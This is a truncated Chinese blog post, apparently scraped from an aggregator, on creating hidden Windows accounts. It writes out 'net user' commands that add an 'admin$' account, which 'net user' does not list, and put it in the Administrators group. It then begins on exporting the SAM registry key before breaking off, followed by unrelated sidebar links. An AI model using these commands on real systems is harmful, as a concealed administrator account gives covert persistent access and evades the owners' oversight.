当前位置:网站首页>隐藏用户的创建和使用
隐藏用户的创建和使用
2022-07-01 21:47:00 【千里ZLP】
1. 隐藏账户创建
在 windows 环境下创建用户如果后面带了一个"$"符号,在 net user 时默认是不显示的,下文基于这个特性展开
新建一个隐藏账户并加入管理员组 (需要管理员权限)
net user admin$ admin /add #用户名要以$结尾
net localgroup administrators admin$ /add
如上图,查看用户时看不到新建的admin$用户。
但是在控制面板的管理工具中的用户与用户组,仍可以查看到该用户的存在
2.导出注册表
在注册表"HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names&
边栏推荐
- 信标委云原生专题组组长,任重道远!
- QT 使用FFmpeg4将argb的Qimage转换成YUV422P
- MySQL learning notes - SQL optimization of optimization
- Slope compensation
- Why does blocprovider feel similar to provider?
- 园区全光技术选型-中篇
- Clean up system cache and free memory under Linux
- Why must digital transformation strategies include continuous testing?
- GaussDB(DWS)主动预防排查
- String type conversion BigDecimal, date type
猜你喜欢
首席信息官对高绩效IT团队定义的探讨和分析
QT版本华睿相机的Demo程序实现
固定资产管理子系统报表分为什么大类,包括哪些科目
小 P 周刊 Vol.11
完全注解的ssm框架搭建
业务可视化-让你的流程图'Run'起来
Mysql——》Innodb存储引擎的索引
In the past 100 years, only 6 products have been approved, which is the "adjuvant" behind the vaccine competition
Mask wearing detection method based on yolov5
Chapter 9 Yunji datacanvas company has been ranked top 3 in China's machine learning platform market
随机推荐
20220701
Mysql——》MyISAM存储引擎的索引
【MySQL】索引的分类
QT uses ffmpeg4 to convert the qimage of ARGB to yuv422p
【单体】流辰信息I-BPSv3服务器推荐配置
Clean up system cache and free memory under Linux
并发编程系列之FutureTask源码学习笔记
内存导致的电脑游戏中显示hdmi无信号 从而死机的情况
Clean up system cache and free memory under Linux
小 P 周刊 Vol.11
性能测试计划怎么编写
List announced | outstanding intellectual property service team in China in 2021
Dark horse programmer - software testing - stage 06 2-linux and database-01-08 Chapter 1 - description of the content of the Linux operating system stage, description of the basic format and common fo
Sonic cloud real machine learning summary 6 - 1.4.1 server and agent deployment
Sonic云真机学习总结6 - 1.4.1服务端、agent端部署
linux下清理系统缓存并释放内存
Make a three digit number of all daffodils "recommended collection"
高攀不起的希尔排序,直接插入排序
The second anniversary of the three winged bird: the wings are getting richer and the take-off is just around the corner
LC501. 二叉搜索树中的众数